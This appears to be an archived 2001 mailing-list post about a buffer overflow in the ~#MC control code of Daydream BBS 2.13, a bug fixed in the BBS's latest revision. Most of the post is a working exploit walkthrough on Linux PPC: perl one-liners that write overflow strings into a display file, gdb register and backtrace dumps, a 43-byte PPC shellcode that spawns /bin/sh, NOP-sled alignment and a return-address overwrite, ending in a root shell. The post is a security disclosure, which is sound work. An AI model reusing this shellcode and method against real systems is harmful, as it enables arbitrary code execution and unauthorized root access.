Here is some information on a hole that was Fixed in Daydream BBS's last revision. There are a few changes in the Daydream BBS change log that I thought were worth mentioning: 2001-12-29 Hannu Lyytinen <hlyytineat_private> * text file control codes ~#MC, ~#TF and ~#RA were vulnerable to buffer overflow attack. Although there are no known exploits, an attacker could run arbitrary code on whatever UID DayDream was running on. 2001-12-27 Hannu Lyytinen <hlyytineat_private> * fixed buffer overflow bug in ~#MC command. Now here is a little background about these issues... /root/daydream-2.13/docshtml/setup.html: You can have the following control codes in your text files Action codes ~#MC[COMMAND]| Menu command ~#TF[FILE]| Show textfile ~#RA[FILE]|[max]| Show random textfile. Format for file is "/path/foobar%d.ext", where %d is a random number (1-[max]). Well heres my first attempt to exploit this ... looks UGLY.. the stack was totally obliterated!@#@ I have never seen destruction like this to my ppc stack. *grin* Program received signal SIGILL, Illegal instruction. 0x41414140 in ?? () (gdb) bt #0 0x41414140 in ?? () (gdb) i r r0 0x41414141 1094795585 r1 0x7fffda90 2147474064 r2 0xd3fec000 -738279424 r3 0x1 1 r4 0x10053890 268777616 r5 0x100538a0 268777632 r6 0x10 16 r7 0x2 2 r8 0xff87d10 267943184 r9 0x10040000 268697600 r10 0xff87d10 267943184 r11 0x0 0 r12 0x2 2 r13 0x10047440 268727360 r14 0x0 0 r15 0x7ffff874 2147481716 r16 0x1 1 r17 0x10040000 268697600 r18 0x10040000 268697600 r19 0x10040000 268697600 r20 0x10040000 268697600 r21 0x10040000 268697600 r22 0x10040000 268697600 r23 0x41414141 1094795585 r24 0x41414141 1094795585 r25 0x41414141 1094795585 r26 0x41414141 1094795585 r27 0x41414141 1094795585 r28 0x41414141 1094795585 r29 0x41414141 1094795585 r30 0x41414141 1094795585 r31 0x41414141 1094795585 pc 0x41414140 1094795584 ps 0x8d032 577586 cr 0x28822828 679618600 lr 0x41414141 1094795585 ctr 0x0 0 xer 0x20000000 536870912 This was accompilshed by the following ... [root@linuxppc bbs]# cat display/iso/welcome.gfx | more ~#MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<9000 A's>| The sweet spot is here... [root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1596'`\|> display/iso/welcome.gfx Ignore my username here ... I was trying to mess with format issues if any existed... [root@linuxppc bbs]# ./daydream DayDream BBS/Unix 2.13 Programming by Antti Häyrynen 1996-1997, DayDream Development Team 1998-2001 You are connected to node #10 at 57600 BPS. ˇ| All accounts deleted - login |ˇ :| as NEW! |: .:| |:. . ....:::| NEW / CHAT / LOGOFF |:::.... . `------------------------------' Username: %p Password: ** Segmentation fault (core dumped) (gdb) bt #0 0x0fece418 in free () from /lib/libc.so.6 #1 0x1001e3f0 in dotype (filename=0x58550 <Address 0x58550 out of bounds>, flags=35) at typetext.c:639 #2 0x1001d0c4 in find_and_type_file (name_comps=0x100537d0, flags=1094795585) at typetext.c:284 #3 0x1001d2ac in typefile (filename=0x7fffdbb0 "", flags=35) at typetext.c:348 #4 0x1001d3c8 in TypeFile (typethis=0x1002a2dc "welcome", flags=35) at typetext.c:380 #5 0x10009b48 in enterbbs () at enterbbs.c:102 #6 0x10003124 in getin () at daydream.c:401 #7 0x10002e9c in visit_bbs (m=0) at daydream.c:310 #8 0x10002b24 in visitbbs (m=0) at daydream.c:210 #9 0x10002a98 in main (argc=1, argv=0x7ffff864) at daydream.c:198 #10 0x0fe71b90 in __libc_start_main () from /lib/libc.so.6 Now we feed it some more to find the Instruction Pointer [root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1614'`\|> display/iso/welcome.gfx echo "~#MC"`perl -e 'print "A" x 1615'`Z\|> display/iso/welcome.gfx Program received signal SIGILL, Illegal instruction. 0x41414158 in ?? () 43 byte shellcode... "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" leaves 1572 bytes in the buffer. or 393 nops plus need for one pad char heres our first try ... [root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x41\x41\x41\x41"'`\| > /home/bbs/display/iso/welcome.gfx Our return is in $r1 (gdb) x/10s $r1 0x7fffda90: "/shAAAA" Lets find the start of the nops (gdb) x/10s $r1-1615 0x7fffd441: "˙Ú\220\020\001Ö´`iii`iii`iii`iii`iii`i Here is perfect nop alignment. (gdb) x/40x $r1-1608 0x7fffd448: 0x60696969 0x7fffd448 is where our code lies sp lets change the return in our mal string [root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x7f\xff\xd4\xd8"'`\| > /home/bbs/display/iso/welcome.gfx ˇ| All accounts deleted - login |ˇ :| as NEW! |: .:| |:. . ....:::| NEW / CHAT / LOGOFF |:::.... . `------------------------------' Username: %p Password: ** sh-2.05# -KF
This archive was generated by hypermail 2b30 : Sun Dec 30 2001 - 17:50:42 PST